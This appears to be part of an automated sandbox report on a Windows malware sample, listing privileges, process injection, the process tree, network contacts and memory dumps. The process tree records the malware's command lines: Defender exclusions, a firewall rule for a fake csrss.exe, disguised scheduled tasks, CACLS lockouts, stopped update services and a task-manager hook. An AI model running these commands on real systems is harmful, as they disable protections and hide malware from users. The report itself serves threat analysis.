Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6397.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DE09.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2176 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\SysWOW64\WerFault.exe
PID 2176 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\SysWOW64\WerFault.exe
PID 2176 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\SysWOW64\WerFault.exe
PID 2176 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\SysWOW64\WerFault.exe
PID 1204 wrote to memory of 2800 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\531F.exe
PID 1204 wrote to memory of 2800 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\531F.exe
PID 1204 wrote to memory of 2800 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\531F.exe
PID 1204 wrote to memory of 2800 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\531F.exe
PID 1204 wrote to memory of 2800 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\531F.exe
PID 1204 wrote to memory of 2800 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\531F.exe
PID 1204 wrote to memory of 2800 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\531F.exe
PID 2800 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\531F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2800 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\531F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2800 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\531F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2800 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\531F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2800 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\531F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2800 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\531F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2800 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\531F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2568 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 2568 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 2568 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 2568 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 2568 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 2568 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 2568 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 1204 wrote to memory of 1304 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5707.exe
PID 1204 wrote to memory of 1304 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5707.exe
PID 1204 wrote to memory of 1304 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5707.exe
PID 1204 wrote to memory of 1304 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5707.exe
PID 2336 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 2336 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 2336 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 2336 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 2336 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 2336 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 2336 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 2756 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe
PID 2756 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe
PID 2756 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe
PID 2756 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe

"C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2176 -s 88

C:\Users\Admin\AppData\Local\Temp\531F.exe

C:\Users\Admin\AppData\Local\Temp\531F.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe

C:\Users\Admin\AppData\Local\Temp\5707.exe

C:\Users\Admin\AppData\Local\Temp\5707.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe

C:\Users\Admin\AppData\Local\Temp\590B.bat

"C:\Users\Admin\AppData\Local\Temp\590B.bat"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\59E3.tmp\59F4.tmp\59F5.bat C:\Users\Admin\AppData\Local\Temp\590B.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 280

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:340 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\6126.exe

C:\Users\Admin\AppData\Local\Temp\6126.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2076 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\6397.exe

C:\Users\Admin\AppData\Local\Temp\6397.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2056 -s 132

C:\Users\Admin\AppData\Local\Temp\67BD.exe

C:\Users\Admin\AppData\Local\Temp\67BD.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\A598.exe

C:\Users\Admin\AppData\Local\Temp\A598.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\CE8C.exe

C:\Users\Admin\AppData\Local\Temp\CE8C.exe

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\D928.exe

C:\Users\Admin\AppData\Local\Temp\D928.exe

C:\Users\Admin\AppData\Local\Temp\DE09.exe

C:\Users\Admin\AppData\Local\Temp\DE09.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 508

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231010214932.log C:\Windows\Logs\CBS\CbsPersist_20231010214932.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2076 CREDAT:472077 /prefetch:2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\system32\taskeng.exe

taskeng.exe {7ABD7202-F279-4015-BED1-5F2A1E245989} S-1-5-21-2180306848-1874213455-4093218721-1000:XEBBURHY\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Roaming\jjfrwhh

C:\Users\Admin\AppData\Roaming\jjfrwhh

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1210562845-75886904112012832361226764823-375466633-14815315333155947651141236489"

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {1E20F389-AF1A-4816-8AF8-108F48F02599} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.35:443 facebook.com tcp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
CZ 157.240.30.35:443 fbcdn.net tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 fbsbx.com udp
CZ 157.240.30.35:443 fbsbx.com tcp
CZ 157.240.30.35:443 fbsbx.com tcp
US 8.8.8.8:53 accounts.youtube.com udp
NL 142.250.179.206:443 accounts.youtube.com tcp
NL 142.250.179.206:443 accounts.youtube.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 85.209.176.171:80 85.209.176.171 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 learn.microsoft.com udp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 496fe6c1-8c7a-4e52-b27d-ef22bd427a6b.uuid.cdntokiog.studio udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp

Files

memory/2596-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2596-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2596-2-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2596-3-0x0000000000400000-0x0000000000409000-memory.dmp

